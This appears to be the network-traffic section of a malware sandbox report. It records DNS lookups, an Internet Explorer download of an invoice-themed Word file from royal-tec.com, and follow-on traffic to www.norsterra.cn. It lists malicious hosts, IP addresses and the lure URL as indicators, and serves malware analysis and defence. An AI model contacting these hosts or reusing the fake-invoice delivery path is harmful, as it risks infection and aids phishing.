Feb 12, 2018 21:34:57.648359060 CET	65490	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:57.702754974 CET	53	50323	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:58.455034971 CET	50323	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:58.455321074 CET	60652	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:58.893884897 CET	53	50323	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.179707050 CET	53	60652	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.179750919 CET	53	65490	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.179770947 CET	53	60652	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.179789066 CET	53	65490	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.179809093 CET	53	60652	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.179828882 CET	53	65490	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.179848909 CET	53	60652	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.255877972 CET	53	65490	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.493480921 CET	64115	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:59.495105982 CET	59195	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:59.649286985 CET	58138	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:59.693895102 CET	60708	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:59.739691973 CET	65034	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:59.929719925 CET	53	64115	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.996036053 CET	53	59195	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:00.301373959 CET	53	58138	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:00.306246996 CET	58653	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:00.357465982 CET	53	60708	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:00.362107992 CET	57327	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:00.419296980 CET	53	65034	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:00.475347042 CET	56352	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:00.719082117 CET	53	58653	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:00.877804041 CET	53	57327	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:00.950191021 CET	53	56352	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:00.979701996 CET	62091	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:01.588718891 CET	53	62091	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:01.593986034 CET	63509	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:01.936188936 CET	53	63509	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:03.092843056 CET	51492	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:03.519247055 CET	62750	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:04.088387012 CET	51492	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:04.130290985 CET	53	62750	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:04.135466099 CET	58913	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:04.702152014 CET	53	58913	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:05.090006113 CET	51492	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:07.337830067 CET	51492	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:08.724467993 CET	53	51492	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:08.724509954 CET	53	51492	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:08.724529028 CET	53	51492	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:08.724548101 CET	53	51492	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:08.953742027 CET	49180	443	192.168.2.2	203.195.212.211
Feb 12, 2018 21:35:08.953763962 CET	443	49180	203.195.212.211	192.168.2.2
Feb 12, 2018 21:35:08.954056025 CET	49180	443	192.168.2.2	203.195.212.211
Feb 12, 2018 21:35:09.023121119 CET	49180	443	192.168.2.2	203.195.212.211
Feb 12, 2018 21:35:09.023133993 CET	443	49180	203.195.212.211	192.168.2.2
Feb 12, 2018 21:35:29.878513098 CET	80	49165	50.63.111.1	192.168.2.2
Feb 12, 2018 21:35:29.878806114 CET	49165	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:35:32.924958944 CET	63309	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:33.335167885 CET	53	63309	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:33.425851107 CET	52316	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:34.422353029 CET	52316	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:34.448367119 CET	53	52316	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:34.451776028 CET	65236	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:34.713340044 CET	53	52316	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:34.817651987 CET	53	65236	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:36.836241961 CET	55904	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:37.037359953 CET	53	55904	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:37.041026115 CET	55581	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:37.228040934 CET	53	55581	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:38.793934107 CET	57178	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:39.278422117 CET	53	57178	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:39.280666113 CET	62406	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:39.571602106 CET	53	62406	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:52.259629011 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:35:52.260015965 CET	49165	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:35:52.260041952 CET	80	49165	50.63.111.1	192.168.2.2
Feb 12, 2018 21:35:52.548424006 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:35:53.149086952 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:35:54.350785017 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:35:56.764659882 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:36:01.560926914 CET	49164	80	192.168.2.2	50.63.111.1
Feb 12, 2018 21:36:11.164587975 CET	49164	80	192.168.2.2	50.63.111.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 12, 2018 21:34:28.263108969 CET	59605	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:29.258646965 CET	59605	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:29.433412075 CET	50900	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:29.437674046 CET	51075	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:29.441893101 CET	61674	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:29.445734978 CET	59291	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:29.449625969 CET	63053	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:29.453346968 CET	60812	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:30.260154009 CET	59605	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:30.430011988 CET	50900	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:30.430290937 CET	51075	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:30.440501928 CET	59291	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:30.440679073 CET	61674	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:30.450293064 CET	60812	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:30.450542927 CET	63053	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:31.117657900 CET	53	61674	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:31.402072906 CET	53	51075	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:31.402118921 CET	53	50900	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:31.772726059 CET	53	59291	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:31.772772074 CET	53	63053	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:31.894151926 CET	59291	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:31.894222975 CET	63053	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:31.894321918 CET	60812	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:31.898345947 CET	50900	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:31.898458004 CET	51075	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:32.263147116 CET	59605	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:32.371428967 CET	53	60812	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:32.644903898 CET	53	50900	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:33.123464108 CET	58523	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:33.392586946 CET	53	51075	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:33.711498976 CET	53	59291	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:33.711538076 CET	53	61674	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:34.115494013 CET	58523	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:34.127120018 CET	53	60812	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:34.127162933 CET	53	63053	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:34.868956089 CET	53	59291	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:35.117594957 CET	58523	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:35.264612913 CET	53	59605	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:35.264658928 CET	53	59605	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:35.264678955 CET	53	59605	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:35.618851900 CET	53	63053	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:35.618896008 CET	53	60812	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:35.618921995 CET	53	50900	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:35.618943930 CET	53	51075	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:35.999469042 CET	53	59605	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:36.596257925 CET	53	58523	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:36.930929899 CET	53	58523	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:37.371037006 CET	53	58523	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:53.547003031 CET	65490	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:53.816781044 CET	60652	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:54.545306921 CET	65490	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:54.815648079 CET	60652	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:54.955754995 CET	57729	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:55.125817060 CET	65311	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:55.301521063 CET	53	57729	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:55.546340942 CET	65490	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:55.816634893 CET	60652	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:55.980210066 CET	53	65311	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:57.330471992 CET	50323	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:57.648359060 CET	65490	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:57.702754974 CET	53	50323	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:58.455034971 CET	50323	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:58.455321074 CET	60652	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:58.893884897 CET	53	50323	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.179707050 CET	53	60652	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.179750919 CET	53	65490	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.179770947 CET	53	60652	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.179789066 CET	53	65490	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.179809093 CET	53	60652	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.179828882 CET	53	65490	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.179848909 CET	53	60652	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.255877972 CET	53	65490	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.493480921 CET	64115	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:59.495105982 CET	59195	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:59.649286985 CET	58138	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:59.693895102 CET	60708	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:59.739691973 CET	65034	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:34:59.929719925 CET	53	64115	8.8.8.8	192.168.2.2
Feb 12, 2018 21:34:59.996036053 CET	53	59195	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:00.301373959 CET	53	58138	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:00.306246996 CET	58653	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:00.357465982 CET	53	60708	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:00.362107992 CET	57327	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:00.419296980 CET	53	65034	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:00.475347042 CET	56352	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:00.719082117 CET	53	58653	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:00.877804041 CET	53	57327	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:00.950191021 CET	53	56352	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:00.979701996 CET	62091	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:01.588718891 CET	53	62091	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:01.593986034 CET	63509	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:01.936188936 CET	53	63509	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:03.092843056 CET	51492	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:03.519247055 CET	62750	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:04.088387012 CET	51492	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:04.130290985 CET	53	62750	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:04.135466099 CET	58913	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:04.702152014 CET	53	58913	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:05.090006113 CET	51492	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:07.337830067 CET	51492	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:08.724467993 CET	53	51492	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:08.724509954 CET	53	51492	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:08.724529028 CET	53	51492	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:08.724548101 CET	53	51492	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:32.924958944 CET	63309	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:33.335167885 CET	53	63309	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:33.425851107 CET	52316	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:34.422353029 CET	52316	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:34.448367119 CET	53	52316	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:34.451776028 CET	65236	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:34.713340044 CET	53	52316	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:34.817651987 CET	53	65236	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:36.836241961 CET	55904	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:37.037359953 CET	53	55904	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:37.041026115 CET	55581	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:37.228040934 CET	53	55581	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:38.793934107 CET	57178	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:39.278422117 CET	53	57178	8.8.8.8	192.168.2.2
Feb 12, 2018 21:35:39.280666113 CET	62406	53	192.168.2.2	8.8.8.8
Feb 12, 2018 21:35:39.571602106 CET	53	62406	8.8.8.8	192.168.2.2

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Feb 12, 2018 21:34:33.711654902 CET	192.168.2.2	8.8.8.8	cffe	(Port unreachable)	Destination Unreachable
Feb 12, 2018 21:34:34.869200945 CET	192.168.2.2	8.8.8.8	cffe	(Port unreachable)	Destination Unreachable
Feb 12, 2018 21:34:35.999608040 CET	192.168.2.2	8.8.8.8	cfff	(Port unreachable)	Destination Unreachable
Feb 12, 2018 21:34:36.931165934 CET	192.168.2.2	8.8.8.8	cffe	(Port unreachable)	Destination Unreachable
Feb 12, 2018 21:35:34.713769913 CET	192.168.2.2	8.8.8.8	d010	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 12, 2018 21:34:28.263108969 CET	192.168.2.2	8.8.8.8	0x4b73	Standard query (0)	royal-tec.com	A (IP address)	IN (0x0001)
Feb 12, 2018 21:34:29.258646965 CET	192.168.2.2	8.8.8.8	0x4b73	Standard query (0)	royal-tec.com	A (IP address)	IN (0x0001)
Feb 12, 2018 21:34:30.260154009 CET	192.168.2.2	8.8.8.8	0x4b73	Standard query (0)	royal-tec.com	A (IP address)	IN (0x0001)
Feb 12, 2018 21:34:32.263147116 CET	192.168.2.2	8.8.8.8	0x4b73	Standard query (0)	royal-tec.com	A (IP address)	IN (0x0001)
Feb 12, 2018 21:35:03.092843056 CET	192.168.2.2	8.8.8.8	0x559e	Standard query (0)	www.norsterra.cn	A (IP address)	IN (0x0001)
Feb 12, 2018 21:35:04.088387012 CET	192.168.2.2	8.8.8.8	0x559e	Standard query (0)	www.norsterra.cn	A (IP address)	IN (0x0001)
Feb 12, 2018 21:35:05.090006113 CET	192.168.2.2	8.8.8.8	0x559e	Standard query (0)	www.norsterra.cn	A (IP address)	IN (0x0001)
Feb 12, 2018 21:35:07.337830067 CET	192.168.2.2	8.8.8.8	0x559e	Standard query (0)	www.norsterra.cn	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	Address	Type	Class
Feb 12, 2018 21:34:35.264612913 CET	8.8.8.8	192.168.2.2	0x4b73	No error (0)	royal-tec.com	50.63.111.1	A (IP address)	IN (0x0001)
Feb 12, 2018 21:34:35.264658928 CET	8.8.8.8	192.168.2.2	0x4b73	No error (0)	royal-tec.com	50.63.111.1	A (IP address)	IN (0x0001)
Feb 12, 2018 21:34:35.264678955 CET	8.8.8.8	192.168.2.2	0x4b73	No error (0)	royal-tec.com	50.63.111.1	A (IP address)	IN (0x0001)
Feb 12, 2018 21:34:35.999469042 CET	8.8.8.8	192.168.2.2	0x4b73	No error (0)	royal-tec.com	50.63.111.1	A (IP address)	IN (0x0001)
Feb 12, 2018 21:35:08.724467993 CET	8.8.8.8	192.168.2.2	0x559e	No error (0)	www.norsterra.cn	203.195.212.211	A (IP address)	IN (0x0001)
Feb 12, 2018 21:35:08.724509954 CET	8.8.8.8	192.168.2.2	0x559e	No error (0)	www.norsterra.cn	203.195.212.211	A (IP address)	IN (0x0001)
Feb 12, 2018 21:35:08.724529028 CET	8.8.8.8	192.168.2.2	0x559e	No error (0)	www.norsterra.cn	203.195.212.211	A (IP address)	IN (0x0001)
Feb 12, 2018 21:35:08.724548101 CET	8.8.8.8	192.168.2.2	0x559e	No error (0)	www.norsterra.cn	203.195.212.211	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

royal-tec.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.2	49164	50.63.111.1	80	C:\Program Files\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2018 21:34:35.295146942 CET	3	OUT	GET /Paid-Invoices HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: royal-tec.com DNT: 1 Connection: Keep-Alive
Feb 12, 2018 21:34:38.917526960 CET	6	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 12 Feb 2018 20:34:37 GMT Server: Apache Location: http://royal-tec.com/Paid-Invoices/ Content-Length: 306 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 6f 79 61 6c 2d 74 65 63 2e 63 6f 6d 2f 50 61 69 64 2d 49 6e 76 6f 69 63 65 73 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 72 6f 79 61 6c 2d 74 65 63 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://royal-tec.com/Paid-Invoices/">here</a>.</p><hr><address>Apache Server at royal-tec.com Port 80</address></body></html>
Feb 12, 2018 21:34:38.991863966 CET	6	OUT	GET /Paid-Invoices/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: royal-tec.com Connection: Keep-Alive DNT: 1
Feb 12, 2018 21:34:41.664854050 CET	23	IN	HTTP/1.1 200 OK Date: Mon, 12 Feb 2018 20:34:40 GMT Server: Apache Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Content-Disposition: attachment; filename="Paid Invoice.doc" Content-Transfer-Encoding: binary Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: application/msword Data Raw: 31 31 66 31 30 0d 0a d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 03 00 fe ff 09 00 06 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 6f 00 00 00 00 00 00 00 00 10 00 00 72 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 6e 00 00 00 7c 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ec a5 c1 00 5b 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a ca 4c ca 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 a8 26 1a 62 a8 26 1a 62 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b7 00 00 00 00 00 e2 07 00 00 00 00 00 00 e2 07 00 00 5e 15 00 00 00 00 00 00 5e 15 00 00 00 00 00 00 5e 15 00 00 00 00 00 00 5e 15 00 00 00 00 00 00 5e 15 00 00 14 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 72 15 00 00 00 00 00 00 72 15 00 00 00 00 00 00 72 15 00 00 00 00 00 00 72 15 00 00 0c 00 00 00 7e 15 00 00 0c 00 00 00 72 15 00 00 00 00 00 00 fb 17 00 00 66 01 00 00 8a 15 00 00 00 00 00 00 8a 15 00 00 00 00 00 00 8a 15 00 00 00 00 00 00 8a 15 00 00 00 00 00 00 8a 15 00 00 00 00 00 00 79 16 00 00 00 00 00 00 79 16 00 00 00 00 00 00 79 16 00 00 00 00 00 00 d1 16 00 00 ab 00 00 00 7c 17 00 00 00 00 00 00 7c 17 00 00 00 00 00 00 7c 17 00 00 00 00 00 00 7c 17 00 00 00 00 00 00 7c 17 00 00 00 00 00 00 7c 17 00 00 24 00 00 00 61 19 00 00 b6 02 00 00 17 1c 00 00 2a 00 00 00 a0 17 00 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 15 00 00 00 00 00 00 79 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 79 16 00 00 00 00 00 00 79 16 00 00 00 00 00 00 79 16 00 00 00 00 00 00 79 16 00 00 00 00 00 00 a0 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 15 00 00 00 00 00 00 5e 15 00 00 00 00 00 00 8a 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8a 15 00 00 ef 00 00 00 b5 17 00 00 16 00 00 00 8d 16 00 00 Data Ascii: 11f10>orn\|[bjbjLL.&b&b^^^^^rrrr~rfyyy\|\|\|\|\|\|$a*^yyyyy^^
Feb 12, 2018 21:34:41.664874077 CET	24	IN	Data Raw: 00 00 00 00 8d 16 00 00 00 00 00 00 8d 16 00 00 00 00 00 00 79 16 00 00 0a 00 00 00 5e 15 00 00 00 00 00 00 8a 15 00 00 00 00 00 00 5e 15 00 00 00 00 00 00 8a 15 00 00 00 00 00 00 d1 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 16 00 00 00 00 Data Ascii: y^^y
Feb 12, 2018 21:34:41.664880991 CET	24	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
